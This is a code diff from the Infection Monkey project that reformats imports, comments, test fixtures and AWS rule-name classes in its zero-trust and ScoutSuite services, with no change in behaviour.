+ test=zero_trust_consts.TEST_MALICIOUS_ACTIVITY_TIMELINE,
+ status=zero_trust_consts.STATUS_VERIFY,
+ events=events,
)
diff --git a/monkey/monkey_island/cc/services/zero_trust/monkey_findings/test_monkey_zt_details_service.py b/monkey/monkey_island/cc/services/zero_trust/monkey_findings/test_monkey_zt_details_service.py
index 191685779..4440d822e 100644
--- a/monkey/monkey_island/cc/services/zero_trust/monkey_findings/test_monkey_zt_details_service.py
+++ b/monkey/monkey_island/cc/services/zero_trust/monkey_findings/test_monkey_zt_details_service.py
@@ -7,7 +7,8 @@ from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_details_serv
def test__remove_redundant_events(monkeypatch):
monkeypatch.setattr(monkey_zt_details_service, "MAX_EVENT_FETCH_CNT", 6)
- # No events are redundant, 8 events in the database, but we display only 6 (3 latest and 3 oldest)
+ # No events are redundant, 8 events in the database, but we display only 6 (3 latest and 3
+ # oldest)
latest_events = ["6", "7", "8"]
_do_redundant_event_removal_test(latest_events, 8, ["6", "7", "8"])
diff --git a/monkey/monkey_island/cc/services/zero_trust/monkey_findings/test_monkey_zt_finding_service.py b/monkey/monkey_island/cc/services/zero_trust/monkey_findings/test_monkey_zt_finding_service.py
index b92a52ae1..7ff54c57f 100644
--- a/monkey/monkey_island/cc/services/zero_trust/monkey_findings/test_monkey_zt_finding_service.py
+++ b/monkey/monkey_island/cc/services/zero_trust/monkey_findings/test_monkey_zt_finding_service.py
@@ -13,17 +13,17 @@ from monkey_island.cc.test_common.fixtures import FixtureEnum
EVENTS = [
Event.create_event(
- title="Process list",
- message="Monkey on gc-pc-244 scanned the process list",
- event_type="monkey_local",
- timestamp=datetime.strptime("2021-01-19 12:07:17.802138", "%Y-%m-%d %H:%M:%S.%f"),
+ title="Process list",
+ message="Monkey on gc-pc-244 scanned the process list",
+ event_type="monkey_local",
+ timestamp=datetime.strptime("2021-01-19 12:07:17.802138", "%Y-%m-%d %H:%M:%S.%f"),
),
Event.create_event(
- title="Communicate as new user",
- message="Monkey on gc-pc-244 couldn't communicate as new user. "
- "Details: System error 5 has occurred. Access is denied.",
- event_type="monkey_network",
- timestamp=datetime.strptime("2021-01-19 12:22:42.246020", "%Y-%m-%d %H:%M:%S.%f"),
+ title="Communicate as new user",
+ message="Monkey on gc-pc-244 couldn't communicate as new user. "
+ "Details: System error 5 has occurred. Access is denied.",
+ event_type="monkey_network",
+ timestamp=datetime.strptime("2021-01-19 12:22:42.246020", "%Y-%m-%d %H:%M:%S.%f"),
),
]
@@ -44,7 +44,7 @@ class TestMonkeyZTFindingService:
def test_create_or_add_to_existing_creation(self):
# Create new finding
MonkeyZTFindingService.create_or_add_to_existing(
- test=TESTS[0], status=STATUS[0], events=[EVENTS[0]]
+ test=TESTS[0], status=STATUS[0], events=[EVENTS[0]]
)
# Assert that it was properly created
findings = list(Finding.objects())
@@ -59,14 +59,14 @@ class TestMonkeyZTFindingService:
def test_create_or_add_to_existing_addition(self):
# Create new finding
MonkeyZTFindingService.create_or_add_to_existing(
- test=TESTS[0], status=STATUS[0], events=[EVENTS[0]]
+ test=TESTS[0], status=STATUS[0], events=[EVENTS[0]]
)
# Assert that there's only one finding
assert len(Finding.objects()) == 1
# Add events to an existing finding
MonkeyZTFindingService.create_or_add_to_existing(
- test=TESTS[0], status=STATUS[0], events=[EVENTS[1]]
+ test=TESTS[0], status=STATUS[0], events=[EVENTS[1]]
)
# Assert there's still only one finding, only events got appended
assert len(Finding.objects()) == 1
@@ -74,7 +74,7 @@ class TestMonkeyZTFindingService:
# Create new finding
MonkeyZTFindingService.create_or_add_to_existing(
- test=TESTS[1], status=STATUS[1], events=[EVENTS[1]]
+ test=TESTS[1], status=STATUS[1], events=[EVENTS[1]]
)
# Assert there was a new finding created, because test and status is different
assert len(MonkeyFinding.objects()) == 2
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/cloudformation_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/cloudformation_rules.py
index c08c7b614..c8dbffb46 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/cloudformation_rules.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/cloudformation_rules.py
@@ -4,6 +4,5 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name
class CloudformationRules(RuleNameEnum):
-
# Service Security
CLOUDFORMATION_STACK_WITH_ROLE = "cloudformation-stack-with-role"
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/ses_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/ses_rules.py
index d1894144d..a73e00478 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/ses_rules.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/ses_rules.py
@@ -4,7 +4,6 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name
class SESRules(RuleNameEnum):
-
# Permissive policies
SES_IDENTITY_WORLD_SENDRAWEMAIL_POLICY = "ses-identity-world-SendRawEmail-policy"
SES_IDENTITY_WORLD_SENDEMAIL_POLICY = "ses-identity-world-SendEmail-policy"
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/sns_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/sns_rules.py
index 47e49a0d1..09d410239 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/sns_rules.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/sns_rules.py
@@ -4,7 +4,6 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name
class SNSRules(RuleNameEnum):
-
# Permissive policies
SNS_TOPIC_WORLD_SUBSCRIBE_POLICY = "sns-topic-world-Subscribe-policy"
SNS_TOPIC_WORLD_SETTOPICATTRIBUTES_POLICY = "sns-topic-world-SetTopicAttributes-policy"
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/sqs_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/sqs_rules.py
index 84190ceb3..44e666f96 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/sqs_rules.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/sqs_rules.py
@@ -4,7 +4,6 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name
class SQSRules(RuleNameEnum):
-
# Permissive policies
SQS_QUEUE_WORLD_SENDMESSAGE_POLICY = "sqs-queue-world-SendMessage-policy"
SQS_QUEUE_WORLD_RECEIVEMESSAGE_POLICY = "sqs-queue-world-ReceiveMessage-policy"
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_parser.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_parser.py
index 134ed3500..37c3b47fd 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_parser.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_parser.py
@@ -2,7 +2,8 @@ from enum import Enum
from common.utils.code_utils import get_value_from_dict
from common.utils.exceptions import RulePathCreatorNotFound
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators_list import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .rule_path_creators_list import (
RULE_PATH_CREATORS_LIST,
)
@@ -35,6 +36,6 @@ class RuleParser:
return RULE_TO_RULE_PATH_CREATOR_HASHMAP[rule_name]
except KeyError:
raise RulePathCreatorNotFound(
- f"Rule path creator not found for rule {rule_name.value}. Make sure to assign"
- f"this rule to any rule path creators."
+ f"Rule path creator not found for rule {rule_name.value}. Make sure to assign"
+ f"this rule to any rule path creators."
)
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudformation_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudformation_rule_path_creator.py
index 40e438eba..d9c3e9491 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudformation_rule_path_creator.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudformation_rule_path_creator.py
@@ -2,12 +2,12 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.cloudform
CloudformationRules,
)
from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .abstract_rule_path_creator import (
AbstractRulePathCreator,
)
class CloudformationRulePathCreator(AbstractRulePathCreator):
-
service_type = SERVICE_TYPES.CLOUDFORMATION
supported_rules = CloudformationRules
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudtrail_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudtrail_rule_path_creator.py
index 928cd138e..ef8d31975 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudtrail_rule_path_creator.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudtrail_rule_path_creator.py
@@ -2,12 +2,12 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.cloudtrai
CloudTrailRules,
)
from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .abstract_rule_path_creator import (
AbstractRulePathCreator,
)
class CloudTrailRulePathCreator(AbstractRulePathCreator):
-
service_type = SERVICE_TYPES.CLOUDTRAIL
supported_rules = CloudTrailRules
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudwatch_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudwatch_rule_path_creator.py
index 4d45c878e..fc88ef7c4 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudwatch_rule_path_creator.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudwatch_rule_path_creator.py
@@ -2,12 +2,12 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.cloudwatc
CloudWatchRules,
)
from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .abstract_rule_path_creator import (
AbstractRulePathCreator,
)
class CloudWatchRulePathCreator(AbstractRulePathCreator):
-
service_type = SERVICE_TYPES.CLOUDWATCH
supported_rules = CloudWatchRules
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/config_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/config_rule_path_creator.py
index b5607cbe8..bce1d765d 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/config_rule_path_creator.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/config_rule_path_creator.py
@@ -2,12 +2,12 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.config_ru
ConfigRules,
)
from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .abstract_rule_path_creator import (
AbstractRulePathCreator,
)
class ConfigRulePathCreator(AbstractRulePathCreator):
-
service_type = SERVICE_TYPES.CONFIG
supported_rules = ConfigRules
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/ec2_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/ec2_rule_path_creator.py
index 8d951f656..d1145559f 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/ec2_rule_path_creator.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/ec2_rule_path_creator.py
@@ -1,11 +1,11 @@
from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.ec2_rules import EC2Rules
from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .abstract_rule_path_creator import (
AbstractRulePathCreator,
)
class EC2RulePathCreator(AbstractRulePathCreator):
-
service_type = SERVICE_TYPES.EC2
supported_rules = EC2Rules
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/elb_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/elb_rule_path_creator.py
index 4af6e351b..56483eaca 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/elb_rule_path_creator.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/elb_rule_path_creator.py
@@ -1,11 +1,11 @@
from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.elb_rules import ELBRules
from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .abstract_rule_path_creator import (
AbstractRulePathCreator,
)
class ELBRulePathCreator(AbstractRulePathCreator):
-
service_type = SERVICE_TYPES.ELB
supported_rules = ELBRules
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/elbv2_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/elbv2_rule_path_creator.py
index 935a8678e..9fbb85f45 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/elbv2_rule_path_creator.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/elbv2_rule_path_creator.py
@@ -1,11 +1,11 @@
from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.elbv2_rules import ELBv2Rules
from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .abstract_rule_path_creator import (
AbstractRulePathCreator,
)
class ELBv2RulePathCreator(AbstractRulePathCreator):
-
service_type = SERVICE_TYPES.ELB_V2
supported_rules = ELBv2Rules
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/iam_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/iam_rule_path_creator.py
index f355dd8e2..52c7e7ac8 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/iam_rule_path_creator.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/iam_rule_path_creator.py
@@ -1,11 +1,11 @@
from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.iam_rules import IAMRules
from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .abstract_rule_path_creator import (
AbstractRulePathCreator,
)
class IAMRulePathCreator(AbstractRulePathCreator):
-
service_type = SERVICE_TYPES.IAM
supported_rules = IAMRules
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/rds_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/rds_rule_path_creator.py
index be4b043d7..1486acc7a 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/rds_rule_path_creator.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/rds_rule_path_creator.py
@@ -1,11 +1,11 @@
from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rds_rules import RDSRules
from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .abstract_rule_path_creator import (
AbstractRulePathCreator,
)
class RDSRulePathCreator(AbstractRulePathCreator):
-
service_type = SERVICE_TYPES.RDS
supported_rules = RDSRules
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/redshift_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/redshift_rule_path_creator.py
index dfa954638..8d72c9945 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/redshift_rule_path_creator.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/redshift_rule_path_creator.py
@@ -2,12 +2,12 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.redshift_
RedshiftRules,
)
from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .abstract_rule_path_creator import (
AbstractRulePathCreator,
)
class RedshiftRulePathCreator(AbstractRulePathCreator):
-
service_type = SERVICE_TYPES.REDSHIFT
supported_rules = RedshiftRules
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/s3_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/s3_rule_path_creator.py
index f06b2554f..bf2fc109d 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/s3_rule_path_creator.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/s3_rule_path_creator.py
@@ -1,11 +1,11 @@
from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.s3_rules import S3Rules
from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .abstract_rule_path_creator import (
AbstractRulePathCreator,
)
class S3RulePathCreator(AbstractRulePathCreator):
-
service_type = SERVICE_TYPES.S3
supported_rules = S3Rules
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/ses_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/ses_rule_path_creator.py
index 7ded2918f..96c23a8ec 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/ses_rule_path_creator.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/ses_rule_path_creator.py
@@ -1,11 +1,11 @@
from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.ses_rules import SESRules
from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .abstract_rule_path_creator import (
AbstractRulePathCreator,
)
class SESRulePathCreator(AbstractRulePathCreator):
-
service_type = SERVICE_TYPES.SES
supported_rules = SESRules
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/sns_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/sns_rule_path_creator.py
index 6eda4fcef..a55a024e0 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/sns_rule_path_creator.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/sns_rule_path_creator.py
@@ -1,11 +1,11 @@
from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.sns_rules import SNSRules
from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .abstract_rule_path_creator import (
AbstractRulePathCreator,
)
class SNSRulePathCreator(AbstractRulePathCreator):
-
service_type = SERVICE_TYPES.SNS
supported_rules = SNSRules
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/sqs_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/sqs_rule_path_creator.py
index e4979caf5..fd634221f 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/sqs_rule_path_creator.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/sqs_rule_path_creator.py
@@ -1,11 +1,11 @@
from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.sqs_rules import SQSRules
from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .abstract_rule_path_creator import (
AbstractRulePathCreator,
)
class SQSRulePathCreator(AbstractRulePathCreator):
-
service_type = SERVICE_TYPES.SQS
supported_rules = SQSRules
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/vpc_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/vpc_rule_path_creator.py
index 9daad607e..cc30083eb 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/vpc_rule_path_creator.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/vpc_rule_path_creator.py
@@ -1,11 +1,11 @@
from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.vpc_rules import VPCRules
from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .abstract_rule_path_creator import (
AbstractRulePathCreator,
)
class VPCRulePathCreator(AbstractRulePathCreator):
-
service_type = SERVICE_TYPES.VPC
supported_rules = VPCRules
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators_list.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators_list.py
index 8ad561ece..441839182 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators_list.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators_list.py
@@ -1,46 +1,61 @@
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.cloudformation_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .rule_path_creators.cloudformation_rule_path_creator import (
CloudformationRulePathCreator,
)
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.cloudtrail_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .rule_path_creators.cloudtrail_rule_path_creator import (
CloudTrailRulePathCreator,
)
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.cloudwatch_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .rule_path_creators.cloudwatch_rule_path_creator import (
CloudWatchRulePathCreator,
)
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.config_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .rule_path_creators.config_rule_path_creator import (
ConfigRulePathCreator,
)
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.ec2_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .rule_path_creators.ec2_rule_path_creator import (
EC2RulePathCreator,
)
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.elb_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .rule_path_creators.elb_rule_path_creator import (
ELBRulePathCreator,
)
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.elbv2_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .rule_path_creators.elbv2_rule_path_creator import (
ELBv2RulePathCreator,
)
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.iam_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .rule_path_creators.iam_rule_path_creator import (
IAMRulePathCreator,
)
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.rds_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .rule_path_creators.rds_rule_path_creator import (
RDSRulePathCreator,
)
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.redshift_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .rule_path_creators.redshift_rule_path_creator import (
RedshiftRulePathCreator,
)
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.s3_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .rule_path_creators.s3_rule_path_creator import (
S3RulePathCreator,
)
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.ses_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .rule_path_creators.ses_rule_path_creator import (
SESRulePathCreator,
)
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.sns_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .rule_path_creators.sns_rule_path_creator import (
SNSRulePathCreator,
)
-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.sqs_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .rule_path_creators.sqs_rule_path_creator import (
SQSRulePathCreator,
)
